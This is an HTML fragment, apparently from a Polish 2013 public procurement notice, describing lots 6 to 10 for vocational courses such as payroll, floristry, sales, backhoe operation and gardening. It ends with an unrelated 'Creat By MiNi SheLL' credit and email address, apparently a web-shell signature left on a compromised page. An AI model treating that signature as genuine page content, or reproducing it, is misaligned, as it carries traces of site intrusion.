<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 
	kurs_ Kadry i płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu rachunkowości (aktywa-pasywa, prezentacja majątku w bilansie, operacje gospodarcze, dowody księgowe, księgi rachunkowe, ewidencja operacji bilansowych i wynikowych, kosztów i przychodów, rozrachunki, księgowość materiałowa i towarowa, aktywa trwałe, inwestycje i zobowiązania finansowe, fundusze własne, rezerwy, jednostkowe sprawozdania finansowe, prawo podatkowe -
koordynacja, podatek od osób fizycznych, prawnych, towarów i usług, prawo pracy i ubezpieczeń społecznych. Łączny wymiar 250 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7  
	kurs_Florysta z obsługą kasy fiskalnej i komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu materiałoznawstwa i technologii florystycznych (zasady kompozycji, botanika, materiał roślinny, układanie i dekoracje, florystyka okolicznościowa), obsługa komputera i kasy fiskalnej w związku z prowadzeniem działalności gospodarczej w tym komputerowych programów sprzedażowych. Łączny wymiar 150 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8  
	kurs_ Sprzedawca z obsługą kasy fiskalnej i komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu profesjonalnej sprzedaży i obsługi klienta, prowadzenie dokumentacji handlowej, rozpoznawanie znaków pieniężnych, obsługa kasy fiskalnej i komputera, obsługa programów sprzedażowych. Łączny wymiar 150 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9  
	kurs_ Operator koparko-ładowarki typ kl. III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka zajęcia teoretyczne i praktyczne  użytkowanie eksploatacyjne, dokumentacja techniczna bezpieczeństwo i higiena pracy, podstawy elektrotechniki, silniki spalinoweelementy hydrauliki, budowa koparko - ładowarek, technologia robót, zajęcia praktyczne. Łączny wymiar 200 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10  
	kurs_Ogrodnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu przygotowanie gleby, nasadzenia, nawożenie, sadzenie, przycinanie drzew, krzewów, obsadzanie kwietników kwiatami rabatowymi, prace ogrodnicze wykonywane na trawnikach, prace porządkowe na terenach zieleni. Łączny wymiar 150 godzin kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4, 80.57.00.00-0, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com